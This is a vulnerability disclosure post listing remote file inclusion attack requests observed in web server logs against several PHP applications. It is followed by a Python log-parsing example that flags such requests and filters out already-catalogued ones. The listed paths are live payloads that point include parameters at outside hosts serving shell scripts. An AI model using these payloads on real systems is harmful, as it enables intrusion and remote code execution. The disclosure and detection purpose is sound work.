[This was originally disclosed on the VIM mail list. VulnDB IDs 90794, 90795, 90796. This was the result of watching Apache logs on attrition.org and observing a wide variety of RFI attacks. I started comparing some of the scripts being attempted with OSVDB and noticed some were not found. That means these were essentially 0days being exploited in the wild.]
Quick searches didn’t find these in OSVDB. I haven’t had time to check the
other VDBs.
/contenido/external/frontend/news.php?cfg[path][includes]=http://www.jef.at/vn
/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pusanfood.com/bbs//skin/zero_vote//data/res.txt??
/claroline/tracking/userLog.php?rootSys=http://www.free-ddl.com/siteadmin/test.txt%3f%3f%3f
/admin/cron_pop.php?adm_path=http://www.smagz.com/bo.do%3f%3f
/class/class.dashboard_lms.php?where_framework=http://www.randdesign.de/ppoint/include/main.txt??
/modules/TotalCalendar/validcode.php?inc_dir=http://www.geocities.com/injitinjitsemut/cmd1.txt??
/classified_right.php?language_dir=http://www.gracesalesco.com/gracesalescocalendar//tools/test.txt??
/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.unescoulsan.org/bbs//data/safe1.txt???
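
The log review described above, as an added example that is not part of the original post: it pulls the request target out of Apache access-log lines, reports every script and parameter whose value decodes to a remote URL, and drops pairs already present in a catalogue. The log lines, the files.example.net host, /demo/known.php and the KNOWN set are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line of an Apache common/combined log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Heuristic: a parameter whose decoded value is an absolute URL.
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def rfi_candidates(log_lines):
    """Return sorted unique (script path, parameter) pairs given a remote URL."""
    found = set()
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        # Split by hand and decode both sides: names may be percent-encoded
        # PHP array keys, values may be encoded and padded with "?".
        for pair in query.split("&"):
            name, _, value = pair.partition("=")
            if REMOTE_RE.match(unquote(value)):
                found.add((unquote(path), unquote(name)))
    return sorted(found)

def uncatalogued(log_lines, known):
    """Pairs seen in the logs that are absent from an existing catalogue."""
    return [pair for pair in rfi_candidates(log_lines) if pair not in known]

# Constructed log lines: documentation-range addresses, placeholder hosts.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2000:10:00:01 +0000] "GET /claroline/tracking/'
    'userLog.php?rootSys=http://files.example.net/t.txt%3f%3f HTTP/1.1" 404 209',
    '203.0.113.9 - - [01/Jan/2000:10:00:05 +0000] "GET /bookmark4u/lostpasswd.php'
    '?env%5Binclude_prefix%5D=http://files.example.net/s.txt??? HTTP/1.1" 404 211',
    '198.51.100.4 - - [01/Jan/2000:10:01:12 +0000] "GET /index.php'
    '?page=about&ref=news HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2000:10:02:40 +0000] "GET /admin/cron_pop.php'
    '?adm_path=http%3A%2F%2Ffiles.example.net%2Fb.txt HTTP/1.0" 404 209',
    '203.0.113.9 - - [01/Jan/2000:10:03:02 +0000] "GET /demo/known.php'
    '?base_dir=http://files.example.net/k.txt? HTTP/1.1" 404 207',
]
# Constructed stand-in for entries a vulnerability database already lists.
KNOWN = {("/demo/known.php", "base_dir")}

if __name__ == "__main__":
    for path, param in uncatalogued(SAMPLE_LOG, KNOWN):
        print(f"{path}  parameter={param}")
```

A parameter that legitimately carries a URL, such as a redirect target, matches the same heuristic, so each hit needs a look at the script before it is treated as an include.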